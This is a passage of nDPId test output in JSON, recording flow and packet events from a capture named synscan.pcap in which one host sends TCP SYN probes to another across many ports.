-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kcAACoGJCusEAAIQA2GNIzSZmbdUoMYAAAAAGACDADGKAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsd6gAAC0Go8qsEAAIQA2GNIzSUVzdUoMYAAAAAGACCADfMgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzTgBDdU4MZAAAAAGACBAC0ewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs6v8AADQGKXOsEAAIQA2GNIzTCzvdU4MZAAAAAGACBAApUQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsPkcAAC8G2yusEAAIQA2GNIzTBGrdU4MZAAAAAGACEAAkIgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsk0UAACgGjS2sEAAIQA2GNIzTwPjdU4MZAAAAAGACBABzkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsjnEAADUGhQGsEAAIQA2GNIzTI4zdU4MZAAAAAGACCAANAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsG1AAADIG+yKsEAAIQA2GNIzTFz7dU4MZAAAAAGACDAAVTgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsYUcAADEGtiusEAAIQA2GNIzTVEPdU4MZAAAAAGACCADcSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs2SUAACUGSk2sEAAIQA2GNIzTBB7dU4MZAAAAAGACCAAsbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsyi8AACkGVUOsEAAIQA2GNIzTA\/7dU4MZAAAAAGACCAAsjgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsoM4AACgGf6SsEAAIQA2GNIzTBhTdU4MZAAAAAGACBAAueAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsho4AACUGnOSsEAAIQA2GNIzTB4\/dU4MZAAAAAGACCAAo\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nsAACkGKPesEAAIQA2GNIzTBArdU4MZAAAAAGACCAAsggAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAseCYAADUGm0ysEAAIQA2GNIzTB\/vdU4MZAAAAAGACCAAokQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsC2kAACgGFQqsEAAIQA2GNIzTIGLdU4MZAAAAAGACBAAUKgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsiWIAADkGhhCsEAAIQA2GNIzTCRPdU4MZAAAAAGACCAAneQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/DUAAC0GHz2sEAAIQA2GNIzTE5HdU4MZAAAAAGACCAAc+wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACcG5gysEAAIQA2GNIzTGiTdU4MZAAAAAGACEAAOaAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsqMAAACwGc7KsEAAIQA2GNIzTJ+fdU4MZAAAAAGACBAAMpQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlMAACYG5B+sEAAIQA2GNIzTHcvdU4MZAAAAAGACDAAOwQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADgGgXusEAAIQA2GNIzTBA\/dU4MZAAAAAGACBAAwfQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNkAADgG+5msEAAIQA2GNIzTAmjdU4MZAAAAAGACBAAyJAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/MAAADIGGbKsEAAIQA2GNIzTJyndU4MZAAAAAGACDAAFYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
